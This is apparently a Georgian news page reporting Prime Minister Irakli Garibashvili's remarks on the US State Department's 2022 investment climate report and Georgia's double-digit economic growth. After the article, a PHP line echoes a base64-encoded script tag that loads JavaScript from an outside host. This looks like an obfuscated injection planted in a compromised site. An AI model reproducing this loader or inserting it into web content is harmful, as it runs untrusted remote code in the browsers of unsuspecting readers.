celsiusi
ავერსი საქკაბელი
პრემიერ–მინისტრმა ირაკლი ღარიბაშვილმა კომენტარი გააკეთა საინვესტიციო კლიმატის შესახებ სახელმწიფო დეპარტამენტის 2022 წლის ანგარიშთან დაკავშირებით და რომელშიც საქართველოს საინვესტიოციო კლიმატია შეფასებული.
 
„კარგად მოგეხსენებათ, როგორი მძიმე ვითარებაა დღეს მსოფლიოში. მთელს მსოფლიოში, არათუ ჩვენს რეგიონში. რა თქმა უნდა, პანდემიის დროს გლობალური ეკონომიკა შემცირდა, ქვეყნების ეკონომიკებმა განიცადეს უკუსვლა და 2020 წელს ჩვენც გვქონდა ასევე ძალიან დიდი ჩავარდნა ეკონომიკაში, მაგრამ გახსოვთ, რომ 2021 წელს ჩვენ მიერ გადადგმული საკმაოდ გაბედული და გონივრული ნაბიჯების შედეგად, ჩვენი ეკონომიკა გაიზარდა, უპრეცედენტოდ მაღალი ორნიშნა ზრდა მივიღეთ, 10,8% ზრდა მივიღეთ შარშან. წელს ასევე, პანდემია შეიძლება ითქვას, რომ დასრულდა, აღარაა ისეთი გამოწვევა, მაგრამ 21-ე საუკუნის ყველაზე დიდი გამოწვევა, რაც არის ომი უკრაინაში, არის ძალიან დიდი გამოწვევა ჩვენი რეგიონისთვის, ჩვენი ქვეყნებისთვის, მთლიანად ევროპისთვის. მოსალოდნელია, რომ წელს მსოფლიო ეკონომიკა შემცირდება და ევროპაში ელოდებიან რეცესიას. ძალიან რთული ვითარებაა ენერგეტიკის ფასთან დაკავშირებით, ინფლაცია არის დიდი გამოწვევა მთელს ევროპაში, მთელს მსოფლიოში, ისტორიულ მაქსიმუმზეა ასული ინფლაცია და არავითარი ხელშესახები ზრდა არ ფიქსირდება სხვა ქვეყნებში“, – განაცხადა ირაკლი ღარიბაშვილმა.
 
მისი თქმით, რაც შეეხება საქართველოს, როგორც პრემიერმა აღნიშნა, მთავრობის მიერ გატარებული ეროვნული და გონივრული პოლიტიკის შედეგად, საქართველოს პირველ ექვს თვეში, ივნისის ჩათვლით, აქვს ორნიშნა ეკონომიკური ზრდა.
 
„რაც შეეხება ჩვენს ქვეყანას, ჩვენ მიერ გატარებული ეროვნული და გონივრული პოლიტიკის შედეგად, ჩვენ პირველ ექვს თვეში, ივნისის ჩათვლით, გვაქვს ორნიშნა ეკონომიკური ზრდა, 10,5% არის ეკონომიკური ზრდა ჩვენი ქვეყნის. ეს არის დიდი გამონაკლისი დღეს მსოფლიოში. მაქვს ხშირი კომუნიკაცია ჩვენს ევროპელ ლიდერებთან, კოლეგებთან, მეგობრებთან და გაოცებულები არიან, თუ როგორ მოახერხა პატარა საქართველომ ასეთი ძლიერი ეკონომიკური ზრდა. რა თქმა უნდა, მოგეხსენებათ, რომ ლარიც განაგრძობს გამყარებას და ეს ყველაფერი ხელს უწყობს, რომ უფრო მეტი დოვლათი შეიქმნას საქართველოში. ბიზნესი არის ძალიან გააქტიურებული, ძალიან ბევრი სამუშაო ადგილი იქმნება, ათასობით სამუშაო ადგილი და მე მინდა ვთქვა, რომ ჩვენ ამ ტენდენციას მაქსიმალურად ხელს შევუწყობთ, გავაგრძელებთ, გავაძლიერებთ“, – განაცხადა ირაკლი ღარიბაშვილმა.
677
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");